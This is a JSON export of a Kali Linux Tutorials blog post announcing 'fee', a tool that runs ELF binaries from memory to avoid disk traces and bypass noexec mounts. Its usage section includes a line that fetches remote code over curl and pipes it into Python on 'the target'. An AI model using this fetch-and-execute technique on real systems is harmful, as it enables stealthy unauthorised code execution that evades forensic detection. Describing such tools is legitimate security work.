{"id":33706,"date":"2024-07-08T06:34:58","date_gmt":"2024-07-08T06:34:58","guid":{"rendered":"https:\/\/kalilinuxtutorials.com\/?p=33706"},"modified":"2024-07-08T06:35:32","modified_gmt":"2024-07-08T06:35:32","slug":"fileless-elf-execution","status":"publish","type":"post","link":"https:\/\/kalilinuxtutorials.com\/fileless-elf-execution\/","title":{"rendered":"Fileless ELF Execution &#8211; Running Binaries In Memory With FEE"},"content":{"rendered":"\n<p>This Python script generates interpreted code which creates the supplied ELF as a file in memory and executes it (without tmpfs). <\/p>\n\n\n\n<p>This makes it possible to execute binaries without leaving traces on the disk.<\/p>\n\n\n\n<p>The technique used for this is explained\u00a0<a href=\"https:\/\/magisterquis.github.io\/2018\/03\/31\/in-memory-only-elf-execution.html\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">here<\/a>.<\/p>\n\n\n\n<p>With default options for each interpreter, running binaries using&nbsp;<code>fee<\/code>&nbsp;does not write to disk whatsoever. This can be verified using tools such as&nbsp;<code>strace<\/code>.<\/p>\n\n\n\n<p><code>fee<\/code>&nbsp;also completely ignores and bypasses&nbsp;<code>noexec<\/code>&nbsp;mount flags, even if they were set on&nbsp;<code>\/proc<\/code>.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Target Requirements<\/strong><a href=\"https:\/\/github.com\/nnsee\/fileless-elf-exec#target-requirements\"><\/a><\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>kernel: 3.17 or later (for\u00a0<code>memfd_create<\/code>\u00a0support)<\/li>\n\n\n\n<li>An interpreter. Any of these:\n<ul class=\"wp-block-list\">\n<li>Python 2<\/li>\n\n\n\n<li>Python 3<\/li>\n\n\n\n<li>Perl<\/li>\n\n\n\n<li>Ruby<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Installation<\/strong><a href=\"https:\/\/github.com\/nnsee\/fileless-elf-exec#installation\"><\/a><\/h2>\n\n\n\n<p>Install this on your host machine using&nbsp;<a href=\"https:\/\/github.com\/pypa\/pipx\">pipx<\/a>:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>$ pipx install fee<\/code><\/pre>\n\n\n\n<p>&#8230; or regular pip:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>$ pip install --user fee<\/code><\/pre>\n\n\n\n<p>You may also clone this repository and run the script directly.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Usage<\/strong><a href=\"https:\/\/github.com\/nnsee\/fileless-elf-exec#usage\"><\/a><\/h2>\n\n\n\n<p>Basic usage: supply the path to the binary you wish to drop:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>$ fee \/path\/to\/binary > output.py<\/code><\/pre>\n\n\n\n<p>You can then pipe this into Python on the target:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>$ curl my.example.site\/output.py | python<\/code><\/pre>\n\n\n\n<p>For more information click <a href=\"https:\/\/github.com\/nnsee\/fileless-elf-exec\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">here<\/a>.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>This Python script generates interpreted code which creates the supplied ELF as a file in memory and executes it (without tmpfs). This makes it possible to execute binaries without leaving traces on the disk. The technique used for this is explained\u00a0here. With default options for each interpreter, running binaries using&nbsp;fee&nbsp;does not write to disk whatsoever. [&hellip;]<\/p>\n","protected":false},"author":12,"featured_media":33709,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi41cEbNFU7nXArgDfTds7rFAc7oVHUyaYEBaLxWU9_zEVz6K58auGzIQW7QHEYNMBXao1Af1oKxffc4bh8cu042xUoVZ25K62A5P3LefkEyQKm7lZzATel2SjOHH-1b-d-FYH6wa0-28kY_v5fD75TOu9WI8i8sYsxZmAzDhmXUmGmnzhO9vp3zT9Vhb3h\/s16000\/Fileless%20ELF%20Execution%20.webp","fifu_image_alt":"","_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[22],"tags":[737,6321,6052,6325],"class_list":["post-33706","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-et","tag-cybersecurity","tag-informationsecurity","tag-kalilinux","tag-kalilinuxtools"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.0 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Fileless ELF Execution - Running Binaries In Memory With FEE<\/title>\n<meta name=\"description\" content=\"This Python script generates interpreted code which creates the supplied ELF as a file in memory and executes it (without tmpfs).\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/kalilinuxtutorials.com\/fileless-elf-execution\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Fileless ELF Execution - Running Binaries In Memory With FEE\" \/>\n<meta property=\"og:description\" content=\"This Python script generates interpreted code which creates the supplied ELF as a file in memory and executes it (without tmpfs).\" \/>\n<meta property=\"og:url\" content=\"https:\/\/kalilinuxtutorials.com\/fileless-elf-execution\/\" \/>\n<meta property=\"og:site_name\" content=\"Kali Linux Tutorials\" \/>\n<meta property=\"article:published_time\" content=\"2024-07-08T06:34:58+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-07-08T06:35:32+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi41cEbNFU7nXArgDfTds7rFAc7oVHUyaYEBaLxWU9_zEVz6K58auGzIQW7QHEYNMBXao1Af1oKxffc4bh8cu042xUoVZ25K62A5P3LefkEyQKm7lZzATel2SjOHH-1b-d-FYH6wa0-28kY_v5fD75TOu9WI8i8sYsxZmAzDhmXUmGmnzhO9vp3zT9Vhb3h\/s16000\/Fileless%20ELF%20Execution%20.webp\" \/>\n<meta name=\"author\" content=\"Varshini\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:image\" content=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi41cEbNFU7nXArgDfTds7rFAc7oVHUyaYEBaLxWU9_zEVz6K58auGzIQW7QHEYNMBXao1Af1oKxffc4bh8cu042xUoVZ25K62A5P3LefkEyQKm7lZzATel2SjOHH-1b-d-FYH6wa0-28kY_v5fD75TOu9WI8i8sYsxZmAzDhmXUmGmnzhO9vp3zT9Vhb3h\/s16000\/Fileless%20ELF%20Execution%20.webp\" \/>\n<meta name=\"twitter:creator\" content=\"@CyberEdition\" \/>\n<meta name=\"twitter:site\" content=\"@CyberEdition\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Varshini\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/fileless-elf-execution\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/fileless-elf-execution\/\"},\"author\":{\"name\":\"Varshini\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/3c3b3f82a74146532c4def299fe069fa\"},\"headline\":\"Fileless ELF Execution &#8211; Running Binaries In Memory With FEE\",\"datePublished\":\"2024-07-08T06:34:58+00:00\",\"dateModified\":\"2024-07-08T06:35:32+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/fileless-elf-execution\/\"},\"wordCount\":163,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\"},\"image\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/fileless-elf-execution\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi41cEbNFU7nXArgDfTds7rFAc7oVHUyaYEBaLxWU9_zEVz6K58auGzIQW7QHEYNMBXao1Af1oKxffc4bh8cu042xUoVZ25K62A5P3LefkEyQKm7lZzATel2SjOHH-1b-d-FYH6wa0-28kY_v5fD75TOu9WI8i8sYsxZmAzDhmXUmGmnzhO9vp3zT9Vhb3h\/s16000\/Fileless%20ELF%20Execution%20.webp\",\"keywords\":[\"cybersecurity\",\"informationsecurity\",\"kalilinux\",\"kalilinuxtools\"],\"articleSection\":[\"Exploitation Tools\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/kalilinuxtutorials.com\/fileless-elf-execution\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/fileless-elf-execution\/\",\"url\":\"https:\/\/kalilinuxtutorials.com\/fileless-elf-execution\/\",\"name\":\"Fileless ELF Execution - Running Binaries In Memory With FEE\",\"isPartOf\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/fileless-elf-execution\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/fileless-elf-execution\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi41cEbNFU7nXArgDfTds7rFAc7oVHUyaYEBaLxWU9_zEVz6K58auGzIQW7QHEYNMBXao1Af1oKxffc4bh8cu042xUoVZ25K62A5P3LefkEyQKm7lZzATel2SjOHH-1b-d-FYH6wa0-28kY_v5fD75TOu9WI8i8sYsxZmAzDhmXUmGmnzhO9vp3zT9Vhb3h\/s16000\/Fileless%20ELF%20Execution%20.webp\",\"datePublished\":\"2024-07-08T06:34:58+00:00\",\"dateModified\":\"2024-07-08T06:35:32+00:00\",\"description\":\"This Python script generates interpreted code which creates the supplied ELF as a file in memory and executes it (without tmpfs).\",\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/kalilinuxtutorials.com\/fileless-elf-execution\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/fileless-elf-execution\/#primaryimage\",\"url\":\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi41cEbNFU7nXArgDfTds7rFAc7oVHUyaYEBaLxWU9_zEVz6K58auGzIQW7QHEYNMBXao1Af1oKxffc4bh8cu042xUoVZ25K62A5P3LefkEyQKm7lZzATel2SjOHH-1b-d-FYH6wa0-28kY_v5fD75TOu9WI8i8sYsxZmAzDhmXUmGmnzhO9vp3zT9Vhb3h\/s16000\/Fileless%20ELF%20Execution%20.webp\",\"contentUrl\":\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi41cEbNFU7nXArgDfTds7rFAc7oVHUyaYEBaLxWU9_zEVz6K58auGzIQW7QHEYNMBXao1Af1oKxffc4bh8cu042xUoVZ25K62A5P3LefkEyQKm7lZzATel2SjOHH-1b-d-FYH6wa0-28kY_v5fD75TOu9WI8i8sYsxZmAzDhmXUmGmnzhO9vp3zT9Vhb3h\/s16000\/Fileless%20ELF%20Execution%20.webp\",\"width\":\"1600\",\"height\":\"900\"},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#website\",\"url\":\"https:\/\/kalilinuxtutorials.com\/\",\"name\":\"Kali Linux Tutorials\",\"description\":\"Kali Linux Tutorials\",\"publisher\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/kalilinuxtutorials.com\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#organization\",\"name\":\"Kali Linux Tutorials\",\"url\":\"https:\/\/kalilinuxtutorials.com\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png\",\"contentUrl\":\"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png\",\"width\":272,\"height\":90,\"caption\":\"Kali Linux Tutorials\"},\"image\":{\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/x.com\/CyberEdition\",\"https:\/\/www.threads.com\/@cybersecurityedition\",\"https:\/\/www.linkedin.com\/company\/cyberedition\",\"https:\/\/www.instagram.com\/cybersecurityedition\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/3c3b3f82a74146532c4def299fe069fa\",\"name\":\"Varshini\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/f19f43637c0f83fb3dcfb498f306b2a9ac0025ce85840ab52ee8c01f5361f269?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/f19f43637c0f83fb3dcfb498f306b2a9ac0025ce85840ab52ee8c01f5361f269?s=96&d=mm&r=g\",\"caption\":\"Varshini\"},\"description\":\"Varshini is a Cyber Security expert in Threat Analysis, Vulnerability Assessment, and Research. Passionate about staying ahead of emerging Threats and Technologies.\",\"sameAs\":[\"http:\/\/kalilinuxtutorials.com\",\"https:\/\/www.linkedin.com\/in\/senthamil-selvan-14043a285\/\"],\"url\":\"https:\/\/kalilinuxtutorials.com\/author\/vinayakagrawal\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Fileless ELF Execution - Running Binaries In Memory With FEE","description":"This Python script generates interpreted code which creates the supplied ELF as a file in memory and executes it (without tmpfs).","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/kalilinuxtutorials.com\/fileless-elf-execution\/","og_locale":"en_US","og_type":"article","og_title":"Fileless ELF Execution - Running Binaries In Memory With FEE","og_description":"This Python script generates interpreted code which creates the supplied ELF as a file in memory and executes it (without tmpfs).","og_url":"https:\/\/kalilinuxtutorials.com\/fileless-elf-execution\/","og_site_name":"Kali Linux Tutorials","article_published_time":"2024-07-08T06:34:58+00:00","article_modified_time":"2024-07-08T06:35:32+00:00","og_image":[{"url":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi41cEbNFU7nXArgDfTds7rFAc7oVHUyaYEBaLxWU9_zEVz6K58auGzIQW7QHEYNMBXao1Af1oKxffc4bh8cu042xUoVZ25K62A5P3LefkEyQKm7lZzATel2SjOHH-1b-d-FYH6wa0-28kY_v5fD75TOu9WI8i8sYsxZmAzDhmXUmGmnzhO9vp3zT9Vhb3h\/s16000\/Fileless%20ELF%20Execution%20.webp","type":"","width":"","height":""}],"author":"Varshini","twitter_card":"summary_large_image","twitter_image":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi41cEbNFU7nXArgDfTds7rFAc7oVHUyaYEBaLxWU9_zEVz6K58auGzIQW7QHEYNMBXao1Af1oKxffc4bh8cu042xUoVZ25K62A5P3LefkEyQKm7lZzATel2SjOHH-1b-d-FYH6wa0-28kY_v5fD75TOu9WI8i8sYsxZmAzDhmXUmGmnzhO9vp3zT9Vhb3h\/s16000\/Fileless%20ELF%20Execution%20.webp","twitter_creator":"@CyberEdition","twitter_site":"@CyberEdition","twitter_misc":{"Written by":"Varshini","Est. reading time":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/kalilinuxtutorials.com\/fileless-elf-execution\/#article","isPartOf":{"@id":"https:\/\/kalilinuxtutorials.com\/fileless-elf-execution\/"},"author":{"name":"Varshini","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/3c3b3f82a74146532c4def299fe069fa"},"headline":"Fileless ELF Execution &#8211; Running Binaries In Memory With FEE","datePublished":"2024-07-08T06:34:58+00:00","dateModified":"2024-07-08T06:35:32+00:00","mainEntityOfPage":{"@id":"https:\/\/kalilinuxtutorials.com\/fileless-elf-execution\/"},"wordCount":163,"commentCount":0,"publisher":{"@id":"https:\/\/kalilinuxtutorials.com\/#organization"},"image":{"@id":"https:\/\/kalilinuxtutorials.com\/fileless-elf-execution\/#primaryimage"},"thumbnailUrl":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi41cEbNFU7nXArgDfTds7rFAc7oVHUyaYEBaLxWU9_zEVz6K58auGzIQW7QHEYNMBXao1Af1oKxffc4bh8cu042xUoVZ25K62A5P3LefkEyQKm7lZzATel2SjOHH-1b-d-FYH6wa0-28kY_v5fD75TOu9WI8i8sYsxZmAzDhmXUmGmnzhO9vp3zT9Vhb3h\/s16000\/Fileless%20ELF%20Execution%20.webp","keywords":["cybersecurity","informationsecurity","kalilinux","kalilinuxtools"],"articleSection":["Exploitation Tools"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/kalilinuxtutorials.com\/fileless-elf-execution\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/kalilinuxtutorials.com\/fileless-elf-execution\/","url":"https:\/\/kalilinuxtutorials.com\/fileless-elf-execution\/","name":"Fileless ELF Execution - Running Binaries In Memory With FEE","isPartOf":{"@id":"https:\/\/kalilinuxtutorials.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/kalilinuxtutorials.com\/fileless-elf-execution\/#primaryimage"},"image":{"@id":"https:\/\/kalilinuxtutorials.com\/fileless-elf-execution\/#primaryimage"},"thumbnailUrl":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi41cEbNFU7nXArgDfTds7rFAc7oVHUyaYEBaLxWU9_zEVz6K58auGzIQW7QHEYNMBXao1Af1oKxffc4bh8cu042xUoVZ25K62A5P3LefkEyQKm7lZzATel2SjOHH-1b-d-FYH6wa0-28kY_v5fD75TOu9WI8i8sYsxZmAzDhmXUmGmnzhO9vp3zT9Vhb3h\/s16000\/Fileless%20ELF%20Execution%20.webp","datePublished":"2024-07-08T06:34:58+00:00","dateModified":"2024-07-08T06:35:32+00:00","description":"This Python script generates interpreted code which creates the supplied ELF as a file in memory and executes it (without tmpfs).","inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/kalilinuxtutorials.com\/fileless-elf-execution\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/kalilinuxtutorials.com\/fileless-elf-execution\/#primaryimage","url":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi41cEbNFU7nXArgDfTds7rFAc7oVHUyaYEBaLxWU9_zEVz6K58auGzIQW7QHEYNMBXao1Af1oKxffc4bh8cu042xUoVZ25K62A5P3LefkEyQKm7lZzATel2SjOHH-1b-d-FYH6wa0-28kY_v5fD75TOu9WI8i8sYsxZmAzDhmXUmGmnzhO9vp3zT9Vhb3h\/s16000\/Fileless%20ELF%20Execution%20.webp","contentUrl":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi41cEbNFU7nXArgDfTds7rFAc7oVHUyaYEBaLxWU9_zEVz6K58auGzIQW7QHEYNMBXao1Af1oKxffc4bh8cu042xUoVZ25K62A5P3LefkEyQKm7lZzATel2SjOHH-1b-d-FYH6wa0-28kY_v5fD75TOu9WI8i8sYsxZmAzDhmXUmGmnzhO9vp3zT9Vhb3h\/s16000\/Fileless%20ELF%20Execution%20.webp","width":"1600","height":"900"},{"@type":"WebSite","@id":"https:\/\/kalilinuxtutorials.com\/#website","url":"https:\/\/kalilinuxtutorials.com\/","name":"Kali Linux Tutorials","description":"Kali Linux Tutorials","publisher":{"@id":"https:\/\/kalilinuxtutorials.com\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/kalilinuxtutorials.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/kalilinuxtutorials.com\/#organization","name":"Kali Linux Tutorials","url":"https:\/\/kalilinuxtutorials.com\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/","url":"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png","contentUrl":"https:\/\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/07\/Kali.png","width":272,"height":90,"caption":"Kali Linux Tutorials"},"image":{"@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/CyberEdition","https:\/\/www.threads.com\/@cybersecurityedition","https:\/\/www.linkedin.com\/company\/cyberedition","https:\/\/www.instagram.com\/cybersecurityedition\/"]},{"@type":"Person","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/3c3b3f82a74146532c4def299fe069fa","name":"Varshini","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/f19f43637c0f83fb3dcfb498f306b2a9ac0025ce85840ab52ee8c01f5361f269?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f19f43637c0f83fb3dcfb498f306b2a9ac0025ce85840ab52ee8c01f5361f269?s=96&d=mm&r=g","caption":"Varshini"},"description":"Varshini is a Cyber Security expert in Threat Analysis, Vulnerability Assessment, and Research. Passionate about staying ahead of emerging Threats and Technologies.","sameAs":["http:\/\/kalilinuxtutorials.com","https:\/\/www.linkedin.com\/in\/senthamil-selvan-14043a285\/"],"url":"https:\/\/kalilinuxtutorials.com\/author\/vinayakagrawal\/"}]}},"jetpack_featured_media_url":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi41cEbNFU7nXArgDfTds7rFAc7oVHUyaYEBaLxWU9_zEVz6K58auGzIQW7QHEYNMBXao1Af1oKxffc4bh8cu042xUoVZ25K62A5P3LefkEyQKm7lZzATel2SjOHH-1b-d-FYH6wa0-28kY_v5fD75TOu9WI8i8sYsxZmAzDhmXUmGmnzhO9vp3zT9Vhb3h\/s16000\/Fileless%20ELF%20Execution%20.webp","jetpack_sharing_enabled":true,"jetpack-related-posts":[{"id":36157,"url":"https:\/\/kalilinuxtutorials.com\/userland-exec\/","url_meta":{"origin":33706,"position":0},"title":"Understanding Userland Exec : A Comprehensive Overview","author":"Varshini","date":"February 6, 2025","format":false,"excerpt":"Userland Exec is a sophisticated technique that replaces the current process image within the existing address space with a new one. Unlike the traditional execve system call, userland exec achieves this without altering kernel-level process structures, meaning that utilities will still report the original process name. This feature makes it\u2026","rel":"","context":"In &quot;Exploitation Tools&quot;","block_context":{"text":"Exploitation Tools","link":"https:\/\/kalilinuxtutorials.com\/category\/et\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/02\/Userland-Exec-.webp?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/02\/Userland-Exec-.webp?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/02\/Userland-Exec-.webp?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/02\/Userland-Exec-.webp?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/02\/Userland-Exec-.webp?resize=1050%2C600&ssl=1 3x, https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/02\/Userland-Exec-.webp?resize=1400%2C800&ssl=1 4x"},"classes":[]},{"id":36274,"url":"https:\/\/kalilinuxtutorials.com\/zapper\/","url_meta":{"origin":33706,"position":1},"title":"Zapper : A Linux Tool For Command Line Privacy","author":"Varshini","date":"February 10, 2025","format":false,"excerpt":"Zapper is a powerful Linux tool designed to enhance privacy by concealing command-line options and processes from system monitoring tools like ps. It is particularly useful for developers, ethical hackers, or anyone who values discretion while running commands on a Linux system. This article explores Zapper's functionality, installation, and how\u2026","rel":"","context":"In &quot;Cyber security&quot;","block_context":{"text":"Cyber security","link":"https:\/\/kalilinuxtutorials.com\/category\/cyber-security\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/02\/zapper.webp?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/02\/zapper.webp?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/02\/zapper.webp?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/02\/zapper.webp?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/02\/zapper.webp?resize=1050%2C600&ssl=1 3x, https:\/\/i0.wp.com\/kalilinuxtutorials.com\/wp-content\/uploads\/2025\/02\/zapper.webp?resize=1400%2C800&ssl=1 4x"},"classes":[]},{"id":7537,"url":"https:\/\/kalilinuxtutorials.com\/goblin-cross-platform-binary-parsing-crate-written-rust\/","url_meta":{"origin":33706,"position":2},"title":"Goblin : An Impish, Cross-Platform Binary Parsing Crate, Written In Rust","author":"R K","date":"December 4, 2019","format":false,"excerpt":"Goblin is an impish, cross-platform binary parsing crate, written in Rust. It supports: An ELF32\/64 parser, and raw C structsA 32\/64-bit, zero-copy, endian aware, Mach-o parser, and raw C structsA PE32\/PE32+ (64-bit) parser, and raw C structsA Unix archive parser and loader Usage Goblin requires\u00a0rustc\u00a01.31.1.Add to your\u00a0Cargo.toml [dependencies] goblin =\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":28458,"url":"https:\/\/kalilinuxtutorials.com\/sandfly-entropyscan-entropy-scanner-for-linux-to-detect-packed-encrypted-binaries-related-to-malware\/","url_meta":{"origin":33706,"position":3},"title":"Sandfly-Entropyscan : Entropy Scanner For Linux To Detect Packed \/ Encrypted Binaries Related To Malware","author":"R K","date":"February 25, 2023","format":false,"excerpt":"Sandfly-Entropyscan is an Entropy scanner for Linux to detect packed or encrypted binaries related to malware. Finds malicious files and Linux processes and gives output with cryptographic hashes. Sandfly-Entropyscan is a utility to quickly scan files or running processes and report on their entropy (measure of randomness) and if they\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEiHFoftROls_al2XKB1WYiINrZfyPSsdyOchmkQ91DkxTlbqKA5gfV2p2aWkfmsxFHhaBTeWvhfVByAKCJVuiYRkdiNgMIkeCfShRFroNWhAy35o334ul6m-DBCXmnjCUF7DCANFDfXgqsOpRCPjKZIRqYX4sJim0aTG81vsFeJ-KP1P1tGMg4M7bp3\/s16000\/scan.jpg?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEiHFoftROls_al2XKB1WYiINrZfyPSsdyOchmkQ91DkxTlbqKA5gfV2p2aWkfmsxFHhaBTeWvhfVByAKCJVuiYRkdiNgMIkeCfShRFroNWhAy35o334ul6m-DBCXmnjCUF7DCANFDfXgqsOpRCPjKZIRqYX4sJim0aTG81vsFeJ-KP1P1tGMg4M7bp3\/s16000\/scan.jpg?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEiHFoftROls_al2XKB1WYiINrZfyPSsdyOchmkQ91DkxTlbqKA5gfV2p2aWkfmsxFHhaBTeWvhfVByAKCJVuiYRkdiNgMIkeCfShRFroNWhAy35o334ul6m-DBCXmnjCUF7DCANFDfXgqsOpRCPjKZIRqYX4sJim0aTG81vsFeJ-KP1P1tGMg4M7bp3\/s16000\/scan.jpg?resize=525%2C300&ssl=1 1.5x, 